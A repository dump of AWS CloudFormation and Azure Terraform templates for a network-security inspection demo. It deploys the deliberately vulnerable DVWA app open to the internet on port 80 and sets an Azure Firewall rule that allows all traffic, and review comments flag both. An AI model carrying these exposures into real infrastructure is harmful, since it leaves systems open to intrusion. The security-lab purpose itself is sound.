sa-east-1: #Sao Paulo 176 | DvwaAMI: ami-06e1409820ba1c928 177 | Conditions: 178 | UsingDefaultBucket: !Equals 179 | - !Ref QSS3BucketName 180 | - 'quickstart-network-security' 181 | Resources: 182 | DVWASecurityGroup: 183 | Type: AWS::EC2::SecurityGroup 184 | Properties: 185 | GroupName: "DVWA-SG1" 186 | GroupDescription: "Security group to access DVWA instance" 187 | VpcId: !Ref VPCID 188 | SecurityGroupIngress: 189 | - IpProtocol: tcp 190 | FromPort: 80 191 | ToPort: 80 192 | CidrIp: 0.0.0.0/0 193 
| - IpProtocol: tcp 194 | FromPort: 22 195 | ToPort: 22 196 | CidrIp: !Ref DVWARemoteAccessCIDR 197 | SecurityGroupEgress: 198 | - IpProtocol: tcp 199 | FromPort: 0 200 | ToPort: 65535 201 | CidrIp: 0.0.0.0/0 202 | DVWA: 203 | Type: AWS::EC2::Instance 204 | Properties: 205 | ImageId: 206 | Fn::FindInMap: 207 | - RegionMap 208 | - Ref: AWS::Region 209 | - DvwaAMI 210 | InstanceType: !Ref DVWAInstanceType 211 | KeyName: !Ref KeyPairName 212 | Tags: 213 | - Key: Name 214 | Value: DVWA 215 | SubnetId: !Ref PublicSubnet1ID 216 | SecurityGroupIds: 217 | - Ref: DVWASecurityGroup 218 | BlockDeviceMappings: 219 | - DeviceName: /dev/sdm 220 | Ebs: 221 | DeleteOnTermination: true 222 | VolumeSize: !Ref RootVolumeSize 223 | Outputs: 224 | DVWASecurityGroup: 225 | Description: DVWA security group ID. 226 | Value: !Ref DVWASecurityGroup 227 | Export: 228 | Name: !Sub '${AWS::StackName}-DVWASecurityGroupID' 229 | DVWAPublicIP: 230 | Description: DVWA instance Public IP 231 | Value: !GetAtt DVWA.PublicIp 232 | Export: 233 | Name: !Sub '${AWS::StackName}-DVWAInstancePublicIP' 234 | Postdeployment: 235 | Description: See the deployment guide for post-deployment steps. 
236 | Value: https://aws.amazon.com/quickstart/?quickstart-all.sort-by=item.additionalFields.sortDate&quickstart-all.sort-order=desc&awsm.page-quickstart-all=5 -------------------------------------------------------------------------------- /east-west-deployment/templates/dvwa.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | Description: DVWA Server with MySql DB 3 | Metadata: 4 | QuickStartDocumentation: 5 | EntrypointName: Launch into an existing VPC 6 | Order: 2 7 | LICENSE: Apache License, Version 2.0 8 | 'AWS::CloudFormation::Interface': 9 | ParameterGroups: 10 | - Label: 11 | default: Network configuration 12 | Parameters: 13 | - VPCID 14 | - PublicSubnet1ID 15 | - DVWARemoteAccessCIDR 16 | - Label: 17 | default: Amazon EC2 configuration 18 | Parameters: 19 | - KeyPairName 20 | - DVWAInstanceType 21 | - RootVolumeSize 22 | - Label: 23 | default: AWS Quick Start configuration 24 | Parameters: 25 | - QSS3BucketName 26 | - QSS3KeyPrefix 27 | - QSS3BucketRegion 28 | ParameterLabels: 29 | QSS3BucketRegion: 30 | default: Quick Start S3 bucket region 31 | DVWAInstanceType: 32 | default: DVWA instance type 33 | KeyPairName: 34 | default: Key pair name 35 | PublicSubnet1ID: 36 | default: Public subnet 1 ID 37 | QSS3BucketName: 38 | default: Quick Start S3 bucket name 39 | QSS3KeyPrefix: 40 | default: Quick Start S3 key prefix 41 | DVWARemoteAccessCIDR: 42 | default: Allowed DVWA external access CIDR 43 | VPCID: 44 | default: VPC ID 45 | RootVolumeSize: 46 | default: Root volume size 47 | cfn-lint: { config: { ignore_checks: [E9007] } } 48 | Parameters: 49 | DVWAInstanceType: 50 | AllowedValues: 51 | - t2.nano 52 | - t2.micro 53 | - t2.small 54 | - t2.medium 55 | - t2.large 56 | - t3.micro 57 | - t3.small 58 | - t3.medium 59 | - t3.large 60 | - t3.xlarge 61 | - t3.2xlarge 62 | - m4.large 63 | - m4.xlarge 64 | - m4.2xlarge 65 | - m4.4xlarge 66 | Default: t2.micro 67 | Description: Amazon 
EC2 instance type for the DVWA instances. 68 | Type: String 69 | KeyPairName: 70 | Description: Name of an existing public/private key pair. If you do not have one in this AWS Region, 71 | please create it before continuing. 72 | Type: 'AWS::EC2::KeyPair::KeyName' 73 | PublicSubnet1ID: 74 | Description: ID of the public subnet 1 that you want to provision the first DVWA into (e.g., subnet-a0246dcd). 75 | Type: 'AWS::EC2::Subnet::Id' 76 | QSS3BucketName: 77 | AllowedPattern: ^[0-9a-zA-Z]+([0-9a-zA-Z-]*[0-9a-zA-Z])*$ 78 | ConstraintDescription: The Quick Start bucket name can include numbers, lowercase 79 | letters, uppercase letters, and hyphens (-). It cannot start or end with a 80 | hyphen (-). 81 | Default: quickstart-network-security 82 | Description: Name of the S3 bucket for your copy of the Quick Start assets. 83 | Keep the default name unless you are customizing the template. 84 | Changing the name updates code references to point to a new Quick 85 | Start location. This name can include numbers, lowercase letters, 86 | uppercase letters, and hyphens, but do not start or end with a hyphen (-). 87 | See https://quickstart-network-security.github.io/option1.html. 88 | Type: String 89 | QSS3BucketRegion: 90 | Default: 'us-west-1' 91 | Description: The AWS Region where the Quick Start S3 bucket (QSS3BucketName) is hosted. When using your own bucket, you must specify this value. 92 | Type: String 93 | QSS3KeyPrefix: 94 | AllowedPattern: ^([0-9a-zA-Z-.]+/)*$ 95 | ConstraintDescription: The Quick Start S3 key prefix can include numbers, lowercase letters, 96 | uppercase letters, hyphens (-), and forward slashes (/). 97 | Default: edge-deployment/ 98 | Description: S3 key prefix that is used to simulate a directory for your copy of the 99 | Quick Start assets. Keep the default prefix unless you are customizing 100 | the template. Changing this prefix updates code references to point to 101 | a new Quick Start location. 
This prefix can include numbers, lowercase 102 | letters, uppercase letters, hyphens (-), and forward slashes (/). End with a forward slash. 103 | See https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html 104 | and https://quickstart-network-security.github.io/option1.html. 105 | Type: String 106 | DVWARemoteAccessCIDR: 107 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$ 108 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/x 109 | Description: Allowed CIDR block for external SSH access to the DVWAs. 110 | Type: String 111 | Default: '127.0.0.1/32' 112 | VPCID: 113 | Description: ID of the VPC (e.g., vpc-0343606e). 114 | Type: 'AWS::EC2::VPC::Id' 115 | RootVolumeSize: 116 | Description: The size in GB for the root EBS volume. 117 | Type: Number 118 | Default: '10' 119 | Rules: 120 | SubnetsInVPC: 121 | Assertions: 122 | - Assert: 123 | 'Fn::EachMemberIn': 124 | - 'Fn::ValueOfAll': 125 | - 'AWS::EC2::Subnet::Id' 126 | - VpcId 127 | - 'Fn::RefAll': 'AWS::EC2::VPC::Id' 128 | AssertDescription: All subnets must exist in the VPC. 
Mappings:
  # Region -> DVWA AMI lookup, consumed by the DVWA instance's ImageId below.
  # NOTE(review): AMI IDs are region-scoped. ami-038255e61d99fa5b7 is listed three
  # times (cn-north-1, cn-northwest-1, eu-west-3) and the cn-* rows are marked
  # "Not created yet", so a launch in either China region will fail to resolve the
  # image -- confirm/replace those entries before relying on them. The pinned IDs
  # carry no patch-level information either; DVWA is intentionally vulnerable, so
  # treat the image as untrusted in every region.
  RegionMap:
    us-east-1: #North Virginia
      DvwaAMI: ami-091ed521de20a50c2
    us-east-2: #Ohio
      DvwaAMI: ami-03d0d38f817e95c6f
    us-west-1: #North California
      DvwaAMI: ami-0b9e4c39f148b835c
    us-west-2: #Oregon
      DvwaAMI: ami-0adb84ff1c722394f
    af-south-1: #Cape Town
      DvwaAMI: ami-0ef071ad81bde0437
    ap-east-1: #Hong Kong
      DvwaAMI: ami-00d021ed3c5b0f047
    ap-south-1: #Mumbai
      DvwaAMI: ami-0dc33407bbfb0381b
    ap-northeast-1: #Tokio
      DvwaAMI: ami-0539984a3053a7c65
    ap-northeast-2: #Seoul
      DvwaAMI: ami-0a6da91fc1b4c3050
    ap-northeast-3: #Osaka
      DvwaAMI: ami-04325f0723618d365
    ap-southeast-1: #Singapore
      DvwaAMI: ami-093e255d56ca99fe0
    ap-southeast-2: #Sydney
      DvwaAMI: ami-03877a0f8b097ea90
    ca-central-1: #Canada
      DvwaAMI: ami-0cd5aadd5da8446d7
    cn-north-1: # Not created yet -- placeholder ID copied from eu-west-3, will not resolve here
      DvwaAMI: ami-038255e61d99fa5b7
    cn-northwest-1: # Not created yet -- placeholder ID copied from eu-west-3, will not resolve here
      DvwaAMI: ami-038255e61d99fa5b7
    eu-central-1: #Frankfurt
      DvwaAMI: ami-08b5eadce176a41de
    eu-west-1: #Ireland
      DvwaAMI: ami-022b465e35144bcf0
    eu-west-2: #London
      DvwaAMI: ami-067257ddeaaec207f
    eu-west-3: #Paris
      DvwaAMI: ami-038255e61d99fa5b7
    eu-south-1: #Milan
      DvwaAMI: ami-01d5f2922f887f140
    eu-north-1: #Stockholm
      DvwaAMI: ami-0d6ee1c8580224f4e
    me-south-1: #Bahrein
      DvwaAMI: ami-0db951eb511fd6a03
    sa-east-1: #Sao Paulo
      DvwaAMI: ami-06e1409820ba1c928
Conditions:
  # Not referenced by any resource in this template; kept only for Quick Start
  # convention alongside the QSS3* parameters.
  UsingDefaultBucket: !Equals
    - !Ref QSS3BucketName
    - 'quickstart-network-security'
Resources:
  # Security group attached to the DVWA instance.
  DVWASecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupName: "DVWA-SG1"
      GroupDescription: "Security group to access DVWA instance"
      VpcId: !Ref VPCID
      SecurityGroupIngress:
        # NOTE(review): DVWA (Damn Vulnerable Web Application) is deliberately
        # exploitable, and this rule exposes it on a public subnet to the whole
        # internet. That may be intended so the inspection path sees real attack
        # traffic, but it also makes the instance a trivial pivot into the VPC;
        # consider limiting the source to DVWARemoteAccessCIDR (or the tester's
        # CIDR) and tearing the stack down as soon as the demo is over.
        - IpProtocol: tcp
          FromPort: 80
          ToPort: 80
          CidrIp: 0.0.0.0/0
        # SSH is effectively closed by default: DVWARemoteAccessCIDR defaults to
        # 127.0.0.1/32, which matches no external source, so it must be set
        # explicitly to allow access.
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22
          CidrIp: !Ref DVWARemoteAccessCIDR
      # Explicit egress: every TCP port to anywhere. Declaring an egress list
      # replaces the implicit allow-all, so non-TCP outbound traffic (UDP, ICMP)
      # is not permitted by this group.
      SecurityGroupEgress:
        - IpProtocol: tcp
          FromPort: 0
          ToPort: 65535
          CidrIp: 0.0.0.0/0
  # The DVWA instance itself, placed in the public subnet supplied by the caller.
  DVWA:
    Type: AWS::EC2::Instance
    Properties:
      ImageId:
        Fn::FindInMap:
          - RegionMap
          - Ref: AWS::Region
          - DvwaAMI
      InstanceType: !Ref DVWAInstanceType
      # No IamInstanceProfile is attached, which is the right call for a
      # deliberately vulnerable app: an SSRF or RCE in DVWA cannot harvest role
      # credentials from the instance metadata service. If a role is ever added,
      # also set MetadataOptions with HttpTokens: required (IMDSv2).
      KeyName: !Ref KeyPairName
      Tags:
        - Key: Name
          Value: DVWA
      SubnetId: !Ref PublicSubnet1ID
      SecurityGroupIds:
        - Ref: DVWASecurityGroup
      # NOTE(review): /dev/sdm is an additional data volume, not the root device,
      # so RootVolumeSize does not resize the root filesystem -- it creates an
      # extra, unformatted EBS volume of that size while the root volume keeps the
      # AMI default. To size the root volume, map the AMI's root device name
      # instead (commonly /dev/xvda or /dev/sda1 -- check the AMI). TODO confirm.
      BlockDeviceMappings:
        - DeviceName: /dev/sdm
          Ebs:
            DeleteOnTermination: true
            VolumeSize: !Ref RootVolumeSize
Outputs:
  DVWASecurityGroup:
    Description: DVWA security group ID.
    Value: !Ref DVWASecurityGroup
    Export:
      Name: !Sub '${AWS::StackName}-DVWASecurityGroupID'
  # Empty unless the subnet auto-assigns public IPv4 addresses: the instance sets
  # no AssociatePublicIpAddress / NetworkInterfaces itself -- confirm
  # MapPublicIpOnLaunch on PublicSubnet1ID.
  DVWAPublicIP:
    Description: DVWA instance Public IP
    Value: !GetAtt DVWA.PublicIp
    Export:
      Name: !Sub '${AWS::StackName}-DVWAInstancePublicIP'
  # Points at the generic Quick Start catalogue, not a guide specific to this
  # template.
  Postdeployment:
    Description: See the deployment guide for post-deployment steps.
    Value: https://aws.amazon.com/quickstart/?quickstart-all.sort-by=item.additionalFields.sortDate&quickstart-all.sort-order=desc&awsm.page-quickstart-all=5
--------------------------------------------------------------------------------
/centralized-with-gwlb/templates/BaseSite.yaml:
--------------------------------------------------------------------------------
AWSTemplateFormatVersion: 2010-09-09

Parameters:
  # ------------------------------------------------------------#
  # Import Master.yaml template
  # ------------------------------------------------------------#
  ImageId:
    Description: Enter the AMI ID of the EC2 instance.
    Type: String
  # NOTE(review): consumed as CidrIp by ALBSecurityGroup, so the value must be in
  # CIDR notation (e.g. 203.0.113.4/32), not a bare address -- stack creation
  # fails otherwise. No AllowedPattern is enforced here; the edge-deployment
  # securitygroups template carries a suitable x.x.x.x/x pattern that could be
  # reused.
  AllowIP:
    Description: Enter the global IP of the terminal to be tested
    Type: String
  # Drives the NeedSSM condition below; only "true"/"false" are accepted.
  NeedSSMAccess:
    Description: If enabled, SSM access to the instance will be available
    Type: String
    AllowedValues: [true, false]
  # ------------------------------------------------------------#
  # Import BaseVPC stack(aws-vpc.template.yaml file)
  # ------------------------------------------------------------#
  # These IDs are typed as plain String rather than AWS::EC2::VPC::Id /
  # AWS::EC2::Subnet::Id, so nothing checks that they exist at parameter
  # validation time; a typo surfaces only when the EC2/ALB resources are created.
  VPCId:
    Description: Enter the VPC ID where you want to deploy the EC2 instance.
    Type: String
  PrivateSubnet1ID:
    Description: Enter the Private Subnet ID where you want to deploy the EC2 instance.
    Type: String
  PublicSubnet1ID:
    Description: Enter the Public Subnet ID where you want to deploy the ALB
    Type: String
  PublicSubnet2ID:
    Description: Enter the Public Subnet ID where you want to deploy the ALB
    Type: String

# ------------------------------------------------------------#
# Conditions
# ------------------------------------------------------------#
Conditions:
  NeedSSM:
    !Equals [true, !Ref NeedSSMAccess]

Resources:
  # ------------------------------------------------------------#
  # Resources for when you need SSM Access, Create IAM Role and Instance Profile
  # ------------------------------------------------------------#
  # Instance role created only when NeedSSMAccess is true. The trust policy
  # allows the EC2 service principal only.
  EC2Role:
    Condition: NeedSSM
    Type: AWS::IAM::Role
    Properties:
      Path: /
      # Explicit RoleName = third "-"-separated segment of the stack name +
      # "-EC2Role". A named role requires CAPABILITY_NAMED_IAM at deploy time and
      # collides with any other stack in the account whose name shares that
      # segment; the stack name must also have at least three "-"-separated
      # parts or Fn::Select fails.
      RoleName:
        Fn::Join:
          - ""
          - - Fn::Select:
                - 2
                - Fn::Split:
                    - "-"
                    - !Ref AWS::StackName
            - "-EC2Role"
      AssumeRolePolicyDocument:
        Version: 2012-10-17
        Statement:
          - Effect: Allow
            Principal:
              Service:
                - ec2.amazonaws.com
            Action:
              - sts:AssumeRole
      MaxSessionDuration: 3600
      ManagedPolicyArns:
        # NOTE(review): AmazonEC2RoleforSSM is AWS's legacy SSM policy and grants
        # more than Session Manager / agent registration need (it includes S3 and
        # CloudWatch Logs write access). AmazonSSMManagedInstanceCore is the
        # current least-privilege equivalent -- confirm nothing in the demo relies
        # on the extra permissions before switching.
        - arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM

  InstanceProfile:
    Condition: NeedSSM
| Type: AWS::IAM::InstanceProfile 74 | Properties: 75 | Path: / 76 | Roles: 77 | - !Ref EC2Role 78 | 79 | # ------------------------------------------------------------# 80 | # Create EC2 Instance 81 | # ------------------------------------------------------------# 82 | EC2Instance: 83 | Type: AWS::EC2::Instance 84 | Properties: 85 | ImageId: !Ref ImageId 86 | InstanceType: t2.micro 87 | SecurityGroupIds: 88 | - !Ref EC2SecurityGroup 89 | IamInstanceProfile: !If 90 | - NeedSSM 91 | - !Ref InstanceProfile 92 | - !Ref AWS::NoValue 93 | SubnetId: !Ref PrivateSubnet1ID 94 | Tags: 95 | - Key: Name 96 | Value: 97 | Fn::Join: 98 | - "" 99 | - - Fn::Select: 100 | - 2 101 | - Fn::Split: 102 | - "-" 103 | - !Ref AWS::StackName 104 | - "-EC2" 105 | UserData: 106 | !Base64 | 107 | #!/bin/bash 108 | amazon-linux-extras install nginx1.12 -y 109 | systemctl start nginx 110 | systemctl enable nginx 111 | 112 | # ------------------------------------------------------------# 113 | # Create 2 Security Group for EC2 Instance and ALB 114 | # ------------------------------------------------------------# 115 | EC2SecurityGroup: 116 | Type: AWS::EC2::SecurityGroup 117 | Properties: 118 | GroupName: 119 | Fn::Join: 120 | - "" 121 | - - Fn::Select: 122 | - 2 123 | - Fn::Split: 124 | - "-" 125 | - !Ref AWS::StackName 126 | - "-EC2-SG" 127 | GroupDescription: Used Web Server 128 | VpcId: !Ref VPCId 129 | SecurityGroupIngress: 130 | - 131 | IpProtocol: tcp 132 | FromPort: 80 133 | ToPort: 80 134 | SourceSecurityGroupId: !Ref ALBSecurityGroup 135 | - 136 | IpProtocol: tcp 137 | FromPort: 443 138 | ToPort: 443 139 | SourceSecurityGroupId: !Ref ALBSecurityGroup 140 | Tags: 141 | - Key: Name 142 | Value: 143 | Fn::Join: 144 | - "" 145 | - - Fn::Select: 146 | - 2 147 | - Fn::Split: 148 | - "-" 149 | - !Ref AWS::StackName 150 | - "-EC2-SG" 151 | ALBSecurityGroup: 152 | Type: AWS::EC2::SecurityGroup 153 | Properties: 154 | GroupName: 155 | Fn::Join: 156 | - "" 157 | - - Fn::Select: 158 | - 2 159 | - 
Fn::Split: 160 | - "-" 161 | - !Ref AWS::StackName 162 | - "-ALB-SG" 163 | GroupDescription: Used ALB 164 | VpcId: !Ref VPCId 165 | SecurityGroupIngress: 166 | - 167 | IpProtocol: tcp 168 | FromPort: 80 169 | ToPort: 80 170 | CidrIp: !Ref AllowIP 171 | - 172 | IpProtocol: tcp 173 | FromPort: 443 174 | ToPort: 443 175 | CidrIp: !Ref AllowIP 176 | Tags: 177 | - Key: Name 178 | Value: 179 | Fn::Join: 180 | - "" 181 | - - Fn::Select: 182 | - 2 183 | - Fn::Split: 184 | - "-" 185 | - !Ref AWS::StackName 186 | - "-ALB-SG" 187 | 188 | # ------------------------------------------------------------# 189 | # Create ALB (Only HTTP) 190 | # ------------------------------------------------------------# 191 | TargetGroup: 192 | Type: AWS::ElasticLoadBalancingV2::TargetGroup 193 | Properties: 194 | VpcId: !Ref VPCId 195 | Name: 196 | Fn::Join: 197 | - "" 198 | - - Fn::Select: 199 | - 2 200 | - Fn::Split: 201 | - "-" 202 | - !Ref AWS::StackName 203 | - "-TG" 204 | Protocol: HTTP 205 | Port: 80 206 | HealthCheckProtocol: HTTP 207 | HealthCheckPath: "/" 208 | HealthCheckPort: "traffic-port" 209 | HealthyThresholdCount: 5 210 | UnhealthyThresholdCount: 2 211 | HealthCheckTimeoutSeconds: 5 212 | HealthCheckIntervalSeconds: 30 213 | Matcher: 214 | HttpCode: 200 215 | Targets: 216 | - Id: !Ref EC2Instance 217 | Port: 80 218 | InternetALB: 219 | Type: AWS::ElasticLoadBalancingV2::LoadBalancer 220 | Properties: 221 | Name: 222 | Fn::Join: 223 | - "" 224 | - - Fn::Select: 225 | - 2 226 | - Fn::Split: 227 | - "-" 228 | - !Ref AWS::StackName 229 | - "-ALB" 230 | Scheme: internet-facing 231 | LoadBalancerAttributes: 232 | - Key: deletion_protection.enabled 233 | Value: false 234 | - Key: idle_timeout.timeout_seconds 235 | Value: 4000 236 | SecurityGroups: 237 | - !Ref ALBSecurityGroup 238 | Subnets: 239 | - !Ref PublicSubnet1ID 240 | - !Ref PublicSubnet2ID 241 | ALBListenerHTTP: 242 | Type: AWS::ElasticLoadBalancingV2::Listener 243 | Properties: 244 | Port: 80 245 | Protocol: HTTP 246 | 
DefaultActions: 247 | - TargetGroupArn: !Ref TargetGroup 248 | Type: forward 249 | # - Type: redirect 250 | # RedirectConfig: 251 | # Host: '#{host}' 252 | # Path: '/#{path}' 253 | # Port: 443 254 | # Protocol: HTTPS 255 | # Query: '#{query}' 256 | # StatusCode: HTTP_301 257 | LoadBalancerArn: !Ref InternetALB 258 | 259 | Outputs: 260 | TargetGroupID: 261 | Value: !Ref TargetGroup 262 | Description: Target group ID of ALB 263 | ALBID: 264 | Value: !Ref InternetALB 265 | Description: ID of ALB 266 | HTTPWebSiteURL: 267 | Value: !GetAtt InternetALB.DNSName 268 | Description: URL to access the web server (HTTP) 269 | HostedZoneId: 270 | Value: !GetAtt InternetALB.CanonicalHostedZoneID 271 | Description: Hosted Zone ID of ALB 272 | InstanceProfile: 273 | Condition: NeedSSM 274 | Value: !Ref InstanceProfile 275 | Description: Instance profile to be used for SSM access -------------------------------------------------------------------------------- /demo_terraform/network.tf: -------------------------------------------------------------------------------- 1 | # network.tf 2 | 3 | # Resource Group 4 | resource "azurerm_resource_group" "demo-rg" { 5 | name = "${var.prefix}-resources" 6 | location = var.location 7 | 8 | tags = { 9 | environment = var.demoenv 10 | } 11 | } 12 | 13 | # Create Inspection VNet 14 | resource "azurerm_virtual_network" "inspection-vnet" { 15 | name = "inspection-vnet" 16 | address_space = ["172.31.0.0/16"] 17 | location = var.location 18 | resource_group_name = azurerm_resource_group.demo-rg.name 19 | 20 | tags = { 21 | environment = var.demoenv 22 | } 23 | } 24 | 25 | # Create Hub-Subnets for VMSS NSVA deployment 26 | resource "azurerm_subnet" "management-subnet" { 27 | name = "management-subnet" 28 | resource_group_name = azurerm_resource_group.demo-rg.name 29 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 30 | address_prefixes = ["172.31.0.0/27"] 31 | 32 | } 33 | resource "azurerm_subnet" "inspection-subnet" { 34 | name = 
"inspection-subnet" 35 | resource_group_name = azurerm_resource_group.demo-rg.name 36 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 37 | address_prefixes = ["172.31.0.32/28"] 38 | } 39 | resource "azurerm_subnet" "sanitized-subnet" { 40 | name = "sanitized-subnet" 41 | resource_group_name = azurerm_resource_group.demo-rg.name 42 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 43 | address_prefixes = ["172.31.0.48/28"] 44 | } 45 | 46 | resource "azurerm_subnet" "workload-subnet" { 47 | name = "workload-subnet" 48 | resource_group_name = azurerm_resource_group.demo-rg.name 49 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 50 | address_prefixes = ["172.31.0.64/27"] 51 | } 52 | 53 | # Load Balancer subnet for VMSS NSVA deployment 54 | resource "azurerm_subnet" "loadbalancer-subnet" { 55 | name = "loadbalancer-subnet" 56 | resource_group_name = azurerm_resource_group.demo-rg.name 57 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 58 | address_prefixes = ["172.31.0.96/27"] 59 | } 60 | 61 | # Create Azure Firewall Subnet 62 | resource "azurerm_subnet" "azure-firewall-subnet" { 63 | name = "AzureFirewallSubnet" 64 | resource_group_name = azurerm_resource_group.demo-rg.name 65 | virtual_network_name = azurerm_virtual_network.inspection-vnet.name 66 | address_prefixes = ["172.31.0.128/26"] 67 | } 68 | 69 | # Public IP for Azure Firewall 70 | resource "azurerm_public_ip" "azure-firewall-PublicIP" { 71 | name = "azure-firewall-PublicIP" 72 | location = azurerm_resource_group.demo-rg.location 73 | resource_group_name = azurerm_resource_group.demo-rg.name 74 | allocation_method = "Static" 75 | sku = "Standard" 76 | } 77 | 78 | # Azure Firewall 79 | resource "azurerm_firewall" "azure-firewall" { 80 | name = "azure-firewall" 81 | location = azurerm_resource_group.demo-rg.location 82 | resource_group_name = azurerm_resource_group.demo-rg.name 83 | 84 | tags = { 85 | environment = var.demoenv 
  }

  # Single IP configuration: firewall sits in AzureFirewallSubnet with a static
  # Standard-SKU public IP. Its private address is referenced by the literal
  # 172.31.0.132 in route-table-sanitized-firewall below; consider using
  # azurerm_firewall.azure-firewall.ip_configuration[0].private_ip_address there
  # so the route cannot drift from the firewall's real address.
  ip_configuration {
    name                 = "azure-firewall-PublicIP-configuration"
    subnet_id            = azurerm_subnet.azure-firewall-subnet.id
    public_ip_address_id = azurerm_public_ip.azure-firewall-PublicIP.id
  }
}

# Nat rule collection
# NOTE(review): source_addresses "*" publishes the host at 172.31.0.68 (presumably
# the web server VM in workload-subnet, 172.31.0.64/27) to the whole internet via
# the firewall's public IP. The translated address is hard-coded rather than
# derived from the VM's NIC, so it silently breaks if the VM is assigned a
# different address -- reference the NIC's private_ip_address if it is defined in
# webserver.tf. UDP/80 is listed alongside TCP although the application rule
# below only allows Http from this host and an HTTP listener does not speak UDP;
# TCP alone is sufficient and narrows the exposure.
resource "azurerm_firewall_nat_rule_collection" "allow-inbound-collection" {
  name = "allow-inbound-collection"
  depends_on = [
    azurerm_public_ip.azure-firewall-PublicIP
  ]
  azure_firewall_name = azurerm_firewall.azure-firewall.name
  resource_group_name = azurerm_resource_group.demo-rg.name
  priority            = 100
  action              = "Dnat"

  rule {
    name = "allow-inbound"

    source_addresses = [
      "*",
    ]

    destination_ports = [
      "80",
    ]

    destination_addresses = [
      azurerm_public_ip.azure-firewall-PublicIP.ip_address
    ]

    translated_port = 80

    translated_address = "172.31.0.68"

    protocols = [
      "TCP",
      "UDP",
    ]
  }
}

# Network Rule Collection
# NOTE(review): this allows any source to any destination on any port and any
# protocol. Despite the collection name it is not limited to outbound traffic --
# it matches every flow the firewall evaluates at the network layer, so the Azure
# Firewall performs no network-level filtering at all. For a demo where inspection
# is meant to happen on the NSVA behind the load balancer (see the route tables
# below) that may be acceptable; otherwise scope source_addresses to the
# sanitized/workload subnets and list only the destinations and ports needed.
resource "azurerm_firewall_network_rule_collection" "allow-outbound-collection" {
  name                = "allow-outbound-collection"
  azure_firewall_name = azurerm_firewall.azure-firewall.name
  resource_group_name = azurerm_resource_group.demo-rg.name
  priority            = 100
  action              = "Allow"

  rule {
    name = "allow-outbound-collection"

    source_addresses = [
      "*",
    ]

    destination_ports = [
      "*",
    ]

    destination_addresses = [
      "*",
    ]

    protocols = [
      "Any",
    ]
  }
}

# Application Rule Collection
# Layer-7 allow for the workload host only (HTTP to any FQDN); note that the
# network rule collection above already permits this traffic unconditionally, so
# this rule adds no restriction in practice while that collection exists.
resource "azurerm_firewall_application_rule_collection" "application-rule-collection" {
  name                = "application-rule-collection"
  azure_firewall_name = azurerm_firewall.azure-firewall.name
  resource_group_name = azurerm_resource_group.demo-rg.name
  priority            =
100 167 | action = "Allow" 168 | 169 | rule { 170 | name = "application-rule-collection" 171 | 172 | source_addresses = [ 173 | "172.31.0.68", 174 | ] 175 | 176 | target_fqdns = [ 177 | "*", 178 | ] 179 | 180 | protocol { 181 | port = "80" 182 | type = "Http" 183 | } 184 | } 185 | } 186 | 187 | # Route Table Clean to FW 188 | resource "azurerm_route_table" "route-table-sanitized-firewall" { 189 | name = "route-table-sanitized-firewall" 190 | location = azurerm_resource_group.demo-rg.location 191 | resource_group_name = azurerm_resource_group.demo-rg.name 192 | disable_bgp_route_propagation = false 193 | 194 | route { 195 | name = "sanitized-firewall" 196 | address_prefix = "0.0.0.0/0" 197 | next_hop_type = "VirtualAppliance" 198 | next_hop_in_ip_address = "172.31.0.132" 199 | } 200 | 201 | tags = { 202 | environment = var.demoenv 203 | } 204 | } 205 | 206 | # Associate Subnet to route-table-sanitized-firewall 207 | resource "azurerm_subnet_route_table_association" "sanitized-subnet" { 208 | subnet_id = azurerm_subnet.sanitized-subnet.id 209 | route_table_id = azurerm_route_table.route-table-sanitized-firewall.id 210 | } 211 | 212 | # Route Table FW to Internet and to Load Balancer 213 | resource "azurerm_route_table" "route-table-internet-loadbalancer" { 214 | name = "route-table-internet-loadbalancer" 215 | location = azurerm_resource_group.demo-rg.location 216 | resource_group_name = azurerm_resource_group.demo-rg.name 217 | disable_bgp_route_propagation = false 218 | 219 | route { 220 | name = "firewall-internet" 221 | address_prefix = "0.0.0.0/0" 222 | next_hop_type = "Internet" 223 | } 224 | 225 | route { 226 | name = "firewall-loadbalancer" 227 | address_prefix = "172.31.0.64/27" 228 | next_hop_type = "VirtualAppliance" 229 | next_hop_in_ip_address = "172.31.0.100" 230 | } 231 | 232 | tags = { 233 | environment = var.demoenv 234 | } 235 | } 236 | 237 | # Associate Subnet to route-table-internet-loadbalancer 238 | resource 
"azurerm_subnet_route_table_association" "azure-firewall-subnet" { 239 | subnet_id = azurerm_subnet.azure-firewall-subnet.id 240 | route_table_id = azurerm_route_table.route-table-internet-loadbalancer.id 241 | } 242 | 243 | # Route Table workload to Load Balancer 244 | resource "azurerm_route_table" "route-table-workload-loadbalancer" { 245 | name = "route-table-workload-loadbalancer" 246 | location = azurerm_resource_group.demo-rg.location 247 | resource_group_name = azurerm_resource_group.demo-rg.name 248 | disable_bgp_route_propagation = false 249 | 250 | route { 251 | name = "route-table-workload-loadbalancer-1" 252 | address_prefix = "0.0.0.0/0" 253 | next_hop_type = "VirtualAppliance" 254 | next_hop_in_ip_address = "172.31.0.100" 255 | } 256 | 257 | route { 258 | name = "route-table-workload-loadbalancer-2" 259 | address_prefix = "172.31.0.128/26" 260 | next_hop_type = "VirtualAppliance" 261 | next_hop_in_ip_address = "172.31.0.100" 262 | } 263 | 264 | tags = { 265 | environment = var.demoenv 266 | } 267 | } 268 | 269 | # Associate Subnet to route-table-workload-loadbalancer 270 | resource "azurerm_subnet_route_table_association" "workload-subnet" { 271 | subnet_id = azurerm_subnet.workload-subnet.id 272 | route_table_id = azurerm_route_table.route-table-workload-loadbalancer.id 273 | } 274 | 275 | # Create Log Analytics Workspace 276 | resource "azurerm_log_analytics_workspace" "log-analytics-workspace" { 277 | name = "log-analytics-workspace" 278 | location = azurerm_resource_group.demo-rg.location 279 | 